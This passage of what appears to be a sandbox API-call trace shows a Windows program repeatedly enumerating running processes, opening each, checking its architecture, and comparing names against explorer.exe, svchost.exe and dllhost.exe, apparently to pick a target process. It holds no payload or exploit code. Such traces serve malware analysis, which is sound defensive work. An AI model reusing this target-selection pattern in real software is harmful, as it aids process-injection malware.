cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0185.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0185.210] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0185.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0185.210] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.210] CloseHandle (hObject=0xd8) returned 1 [0185.210] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0185.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0185.211] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.211] CloseHandle (hObject=0xd8) returned 1 [0185.211] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0185.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0185.211] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.211] CloseHandle (hObject=0xd8) returned 1 [0185.211] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0185.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0185.212] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.212] CloseHandle (hObject=0xd8) returned 1 [0185.212] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0185.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0185.213] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.213] CloseHandle (hObject=0xd8) returned 1 [0185.213] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0185.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0185.213] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.213] CloseHandle (hObject=0xd8) returned 1 [0185.213] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0185.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0185.214] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.214] CloseHandle (hObject=0xd8) returned 1 [0185.214] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0185.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0185.214] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.214] CloseHandle (hObject=0xd8) returned 1 [0185.215] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0185.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0185.215] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.215] CloseHandle (hObject=0xd8) returned 1 [0185.215] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0185.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0185.216] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.216] CloseHandle (hObject=0xd8) returned 1 [0185.216] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0185.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0185.218] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.218] CloseHandle (hObject=0xd8) returned 1 [0185.218] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0185.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0185.218] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.218] CloseHandle (hObject=0xd8) returned 1 [0185.218] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0185.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0185.219] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.219] CloseHandle (hObject=0xd8) returned 1 [0185.219] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0185.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0185.219] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.219] CloseHandle (hObject=0xd8) returned 1 [0185.219] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0185.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0185.220] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.220] CloseHandle (hObject=0xd8) returned 1 [0185.220] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0185.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0185.221] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.221] CloseHandle (hObject=0xd8) returned 1 [0185.221] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0185.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0185.221] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.221] CloseHandle (hObject=0xd8) returned 1 [0185.221] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0185.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0185.222] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.222] CloseHandle (hObject=0xd8) returned 1 [0185.222] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0185.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0185.222] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.222] CloseHandle (hObject=0xd8) returned 1 [0185.222] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0185.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0185.223] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.223] CloseHandle (hObject=0xd8) returned 1 [0185.223] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0185.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0185.223] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.224] CloseHandle (hObject=0xd8) returned 1 [0185.224] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0185.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0185.224] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0185.225] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0185.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0185.225] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0185.226] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0185.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0185.226] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0185.227] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0185.227] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.227] CloseHandle (hObject=0xd8) returned 1 [0185.227] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0185.227] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0185.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0185.228] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.228] CloseHandle (hObject=0xd8) returned 1 [0185.228] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0185.228] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0185.228] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0185.228] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0185.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0185.229] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0185.229] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.229] CloseHandle (hObject=0xd8) returned 1 [0185.229] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0185.230] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.230] CloseHandle (hObject=0xd8) returned 1 [0185.230] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0185.230] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0185.230] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.230] CloseHandle (hObject=0xd8) returned 1 [0185.230] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.231] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0185.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0185.231] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.232] CloseHandle (hObject=0xd8) returned 1 [0185.232] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0185.232] CloseHandle (hObject=0xd4) returned 1 [0185.232] Sleep (dwMilliseconds=0x3e8) [0186.241] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0186.243] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0186.244] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0186.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0186.245] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0186.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0186.245] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0186.245] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0186.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0186.246] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0186.246] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0186.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0186.247] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0186.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0186.247] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0186.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0186.248] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0186.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0186.248] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0186.249] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0186.249] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0186.250] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0186.250] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0186.251] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0186.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0186.251] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, 